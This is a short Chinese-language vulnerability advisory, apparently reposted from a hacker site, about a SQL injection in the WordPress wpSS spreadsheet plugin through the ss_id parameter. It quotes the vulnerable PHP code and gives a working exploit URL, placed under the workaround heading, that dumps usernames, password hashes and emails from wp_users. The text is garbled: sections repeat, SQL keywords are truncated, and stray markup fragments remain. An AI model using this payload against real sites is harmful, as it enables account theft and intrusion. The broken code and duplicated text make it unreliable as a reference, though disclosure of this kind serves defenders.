来源:Hack57
受影响系统:
WordPress wpSS <= 0.6 v
不受影响系统:
WordPress wpSS 0.62
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 28894
wpSS是WordPress中所使用的电子表格插件,允许在WordPress博客中嵌入交互式的电子表格。
wpSS插件的wpSS/ss_load.php文件中没有正确地过滤对ss_id参数的数便用在了SQL查询中:
<*来源:1ten0.0net1
链接:http://secunia.com/advisories/29938/
*>
建议:
--------------------------------------------------------------------------------
临时解决方法:
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://timrohrer.com/blog/?page_id=71
本文来源于Hacker ART http://hacker57.com , 原文地址: http://hacker57.com/wordpress-wpss.html
=>*来源:1ten0.0net1br>
受影响系统:
WordPress wpSS <= 0.6 v
不受影响系统:
WordPress wpSS 0.62
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 28894
wpSS是WordPress中所使用的电子表格插件,允许在WordPress博客中嵌入交互式的电子表格。
wpSS插件的wpSS/ss_load.php文件中没有正确地过滤对ss_id参数的数便用在了SQL查询中:
ss_load.php
$id = $_GET[′ss_id′];
....
ss_functions.php:
function ss_load ($id, $plain=FALSE) {
....
if ($wpdb->query("CT * $table_name id=′$id′") == 0) {
....
这允许远程攻击者通过注入任意SQL代码操控SQL查询,导致执行任意代码。$id = $_GET[′ss_id′];
....
ss_functions.php:
function ss_load ($id, $plain=FALSE) {
....
if ($wpdb->query("CT * $table_name id=′$id′") == 0) {
....
<*来源:1ten0.0net1
链接:http://secunia.com/advisories/29938/
*>
建议:
--------------------------------------------------------------------------------
临时解决方法:
http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+ct+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4++wp_users--&display=plain
厂商补丁:---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://timrohrer.com/blog/?page_id=71
本文来源于Hacker ART http://hacker57.com , 原文地址: http://hacker57.com/wordpress-wpss.html
=>*来源:1ten0.0net1br>